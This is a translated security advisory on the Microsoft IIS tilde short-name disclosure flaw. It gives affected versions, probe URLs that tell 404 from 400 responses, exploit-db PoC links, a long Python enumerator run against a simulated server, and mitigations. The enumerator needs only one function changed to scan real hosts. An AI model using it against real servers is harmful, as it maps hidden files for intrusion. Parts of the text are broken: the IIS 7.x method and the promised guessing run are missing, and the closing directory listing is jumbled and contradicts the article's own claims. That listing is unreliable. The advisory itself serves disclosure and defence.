This article is translated from NLP.
IIS (Internet Information Services) is a web server created by Microsoft for the Windows operating system. It is the third most popular web server in the world.
Vulnerability description:
A vulnerability has been found in Microsoft IIS. An attacker can exploit it by sending requests whose path contains the tilde character "~" in order to disclose the 8.3 short names of files and folders on the server.
Affected Versions:
IIS 1.0, Windows NT 3.51
IIS 2.0, Windows NT 4.0
IIS 3.0, Windows NT 4.0 Service Pack 2
IIS 4.0, Windows NT 4.0 Option Pack
IIS 5.0, Windows 2000
IIS 5.1, Windows XP Professional and Windows XP Media Center Edition
IIS 6.0, Windows Server 2003 and Windows XP Professional x64 Edition
IIS 7.0, Windows Server 2008, and Windows Vista
IIS 7.5, Windows 7 (when remote errors are disabled or there is no web.config file)
IIS 7.5, Windows Server 2008 (Classic pipeline mode)
Vulnerability analysis and exploitation:
If a website runs on an IIS server, an attacker can use the "~" character to discover the short names of files and folders, and in this way locate important files or folders that are not normally visible.
For an in-depth analysis of this vulnerability, see the following article:
http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/
Vulnerability details:
I had been looking for a way to send requests to IIS that use the wildcards "*" and "?" when I noticed that IIS answers a request differently when the path contains "~". Based on this behaviour, the HTTP response tells us whether a file matching the request exists or not. In the examples below, a file validxxx.xxx exists in the web root (xxx.xxx stands for the part of the name that is still unknown and has to be guessed). The main difference between IIS versions is which error each one returns for an existing versus a non-existing name, and that error is what we use to decide whether a file exists.
For example, the short-name guessing method for a website http://www.xxx.com running IIS 6 is:
If the request http://www.xxx.com/a*~1*/.aspx returns 404, a file whose short name starts with "a" (axxx.xxx) exists; the remaining characters and the extension still have to be guessed.
If the request http://www.xxx.com/a*~1*/.aspx returns 400, no file starting with "a" exists.
The IIS 5.x judgment method is as follows:
If the request /a*~1* returns 404, a file starting with "a" exists.
If the request /a*~1* returns 400, no file starting with "a" exists.
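The following is an added example, not code from this article or from the exploit-db PoC. It implements the IIS 6 guessing procedure described above (404 for an existing short name, 400 otherwise) as a depth-first search, and runs it against a simulated server so that it works offline: the sample web root SAMPLE_WEBROOT, the simplified NTFS 8.3 short-name model in short_names, the fake server make_iis6_oracle and the guessing functions guess_bases, guess_extensions and enumerate_short_names are all assumptions of this example. It also shows two limits of the technique: a name that already fits 8.3 (ah.txt) has no short name and is never found, and only six base characters plus a three-character extension are ever recovered.

```python
"""Simulated IIS 6 tilde (~) short-name enumeration: added example, not the
article's or the exploit-db PoC's code. The web root, the 8.3 model and the
oracle are assumptions; against a real host only probe() would change."""
import fnmatch

# Constructed sample web root (assumption, not from the article).
SAMPLE_WEBROOT = [
    "AcSecret.html",    # -> ACSECR~1.HTM
    "web.config",       # -> WEB~1.CON (extension longer than 3)
    "default.aspx",     # -> DEFAUL~1.ASP
    "backup_2012.zip",  # -> BACKUP~1.ZIP
    "ah.txt",           # already 8.3: NTFS creates no short name
    "123456789.txt",    # -> 123456~1.TXT
    "0123456789.txt",   # -> 012345~1.TXT
]

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_-"


def _clean(part):
    """Keep only characters this simplified 8.3 model allows."""
    return "".join(ch for ch in part.upper() if ch.isalnum() or ch in "_-")


def short_names(long_names):
    """Simplified NTFS 8.3 generation: 6 base chars + ~N + 3-char extension.
    Names that already fit 8.3 get no short name; collisions get ~1, ~2, ..."""
    used, result = set(), []
    for name in long_names:
        base, _, ext = name.rpartition(".") if "." in name else (name, "", "")
        cb, ce = _clean(base), _clean(ext)[:3]
        if cb == base.upper() and ce == ext.upper() and 0 < len(cb) <= 8:
            continue  # fits 8.3 already, so NTFS creates no short name
        n, cand = 1, None
        while cand is None or cand in used:
            cand = f"{cb[:6]}~{n}" + (f".{ce}" if ce else "")
            n += 1
        used.add(cand)
        result.append(cand)
    return result


def make_iis6_oracle(long_names):
    """Fake IIS 6: 404 when a short name matches the wildcard in /<pat>/.aspx,
    else 400, which is exactly the distinction the article relies on."""
    shorts = short_names(long_names)

    def probe(path):
        probe.count += 1
        assert path.startswith("/") and path.endswith("/.aspx"), path
        pattern = path[1:-len("/.aspx")].upper()
        return 404 if any(fnmatch.fnmatchcase(s, pattern) for s in shorts) else 400

    probe.count = 0
    return probe


def exists(probe, pattern):
    """The IIS 6 rule: 404 means a matching short name exists."""
    return probe(f"/{pattern}/.aspx") == 404


def guess_bases(probe, prefix="", index=1, max_len=6):
    """Depth-first guess of the base (at most 6 characters are recoverable)."""
    bases = []
    if prefix and exists(probe, f"{prefix}~{index}*"):
        bases.append(prefix)  # base complete (shorter than 6 characters)
    if len(prefix) < max_len:
        for ch in CHARSET:
            if exists(probe, f"{prefix}{ch}*~{index}*"):
                bases.extend(guess_bases(probe, prefix + ch, index, max_len))
    return bases


def guess_extensions(probe, base, index=1, max_len=3):
    """Guess the extension of BASE~index; "" means none (typically a folder)."""
    exts = [""] if exists(probe, f"{base}~{index}") else []

    def walk(prefix):
        if prefix and exists(probe, f"{base}~{index}.{prefix}"):
            exts.append(prefix)
        if len(prefix) < max_len:
            for ch in CHARSET:
                if exists(probe, f"{base}~{index}.{prefix}{ch}*"):
                    walk(prefix + ch)

    walk("")
    return exts


def enumerate_short_names(probe, max_index=2):
    """Every BASE~N.EXT the oracle reveals, spelled the way IIS returns it."""
    found = []
    for index in range(1, max_index + 1):
        for base in guess_bases(probe, index=index):
            for ext in guess_extensions(probe, base, index):
                found.append(f"{base}~{index}{'.' + ext if ext else ''}".upper())
    return sorted(found)


if __name__ == "__main__":
    oracle = make_iis6_oracle(SAMPLE_WEBROOT)
    for name in enumerate_short_names(oracle):
        print(name)
    print(f"{oracle.count} requests; ah.txt is invisible because it has no short name")
```

Against a real IIS 6 host, probe would issue an HTTP GET for the path and return the status code; nothing else changes. The printed request count shows why scanners limit the character set, and why custom 400/404 error pages, which remove the status-code difference, break the oracle entirely. The index loop covers colliding names (a second file with the same six-character base gets ~2), which a real scanner also has to try.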
For IIS 7.x with .NET 2 and no custom error handling, the judgment method is as follows.
A complete IIS 6 guessing run is attached below.
Test address: http://sdl.me/AcSecret.html (the file AcSecret.html exists on that server). The guessing process is as follows:
A detailed PoC and an exploitation paper are available:
PoC: http://www.exploit-db.com/sploits/19525.zip
Paper: http://www.exploit-db.com/download_pdf/19527
Vulnerability fix:
Apply the fixes provided by Microsoft or by security vendors. In particular, disable 8.3 short-name creation on the NTFS volume (see the Microsoft KB article in the references below); note that files and folders that already have a short name keep it until they are recreated, so existing content has to be copied to a fresh location after the change.
Use a properly configured web application firewall: rejecting web requests whose path contains "~" can prevent exploitation of this vulnerability.
Vulnerability discoverer:
Soroush Dalili (@irsdl)
Ali Abbasnejad
Vulnerability reference:
http://support.microsoft.com/kb/142982/en-us
http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/
Webmaster comment:
In fact, this is a rare kind of "vulnerability"......
First, if the file name already complies with the 8.3 standard (the base name is at most 8 bytes and the extension at most 3 bytes), there is no short file name.
Second, Chinese characters, special characters and the like are also a headache......
Finally, even if you guess it, you only get the first six characters; after that you can only try your luck......
Still, it is of no small use. It is an alternative kind of "vulnerability"......
(Note: if the target site customizes its 400 and 404 error pages, the scanner cannot tell the difference......)
See the following directory listing (short name column, then long name; entries that already fit 8.3 have no short name):
2012/07/04  20:46    <DIR>    !@#!@#~1.TXT    !@#!@#!@Brief.txt
2012/07/04  20:46    <DIR>                    !@#!@Brief.txt
                     <DIR>    012345~1        0123456789
2012/07/04  20:44    <DIR>                    1
                     <DIR>                    123
                     <DIR>                    123456
                     <DIR>                    1234567
2012/07/04  20:44    <DIR>                    12345678
                     <DIR>    123456~1        123456789
                     <DIR>                    ah.txt
                     <DIR>    AH~1.TXT.
                              012345~1.TXT    0123456789.txt
                                              1.txt
                 29                           123.txt
                 29                           123456.txt
                 29                           1234567.txt
                 29                           12345678.txt
                 29           123456~1.TXT    123456789.txt
From nuclear'atk Network Security Research Center